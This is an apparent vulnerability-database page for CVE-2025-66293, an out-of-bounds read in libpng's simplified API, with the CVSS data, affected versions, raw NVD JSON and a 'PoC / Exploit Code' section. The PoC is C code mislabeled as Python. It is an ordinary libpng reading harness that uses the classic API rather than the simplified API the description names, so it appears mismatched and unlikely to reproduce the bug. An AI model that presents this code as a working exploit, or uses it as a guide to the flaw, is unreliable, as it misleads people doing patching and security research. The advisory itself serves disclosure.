Security Vulnerability Report
中文
CVE-2025-66293 CVSS 7.1 HIGH

CVE-2025-66293

Published: 2025-12-03 21:15:53
Last Modified: 2025-12-16 19:12:50
Source: [email protected]

Description

LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:* - VULNERABLE
libpng < 1.6.52

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-66293 PoC - Malicious PNG trigger // Requirements: A specially crafted PNG with palette, partial transparency, and gamma correction #include <stdio.h> #include <stdlib.h> #include <png.h> void process_png(const char *filename) { FILE *fp = fopen(filename, "rb"); if (!fp) return; png_structp png = png_create_read_struct(PNG_LIBPNG_VER_STRING, NULL, NULL, NULL); png_infop info = png_create_info_struct(png); if (setjmp(png_jmpbuf(png))) { printf("Error reading PNG\n"); png_destroy_read_struct(&png, &info, NULL); fclose(fp); return; } png_init_io(png, fp); png_read_info(png, info); // Trigger vulnerability: palette + transparency + gamma int width = png_get_image_width(png, info); int height = png_get_image_height(png, info); png_byte color_type = png_get_color_type(png, info); png_byte bit_depth = png_get_bit_depth(png, info); // Convert to RGBA if palette type if (color_type == PNG_COLOR_TYPE_PALETTE) { png_set_palette_to_rgb(png); } // Enable transparency handling if (png_get_valid(png, info, PNG_INFO_tRNS)) { png_set_tRNS_to_alpha(png); } // Enable gamma correction - THIS TRIGGERS THE BUG double gamma; if (png_get_gAMA(png, info, &gamma)) { png_set_gamma(png, 2.2, gamma); } png_read_update_info(png, info); // Allocate and read rows png_bytep *row_pointers = (png_bytep*)malloc(sizeof(png_bytep) * height); for (int y = 0; y < height; y++) { row_pointers[y] = (png_byte*)malloc(png_get_rowbytes(png, info)); } png_read_image(png, row_pointers); // Cleanup for (int y = 0; y < height; y++) { free(row_pointers[y]); } free(row_pointers); png_destroy_read_struct(&png, &info, NULL); fclose(fp); } int main(int argc, char *argv[]) { if (argc < 2) { printf("Usage: %s <png_file>\n", argv[0]); return 1; } process_png(argv[1]); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66293", "sourceIdentifier": "[email protected]", "published": "2025-12-03T21:15:53.060", "lastModified": "2025-12-16T19:12:50.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. Prior to 1.6.52, an out-of-bounds read vulnerability in libpng's simplified API allows reading up to 1012 bytes beyond the png_sRGB_base[512] array when processing valid palette PNG images with partial transparency and gamma correction. The PNG files that trigger this vulnerability are valid per the PNG specification; the bug is in libpng's internal state management. Upgrade to libpng 1.6.52 or later."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libpng:libpng:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.52", "matchCriteriaId": "98FBE7B9-73DC-483B-87E8-5229792557C3"}]}]}], "references": [{"url": "https://github.com/pnggroup/libpng/commit/788a624d7387a758ffd5c7ab010f1870dea753a1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/commit/a05a48b756de63e3234ea6b3b938b8f5f862484a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pnggroup/libpng/issues/764", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-9mpm-9pxh-mg4f", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/03/8", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "https://github.com/pnggroup/libpng/issues/764", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.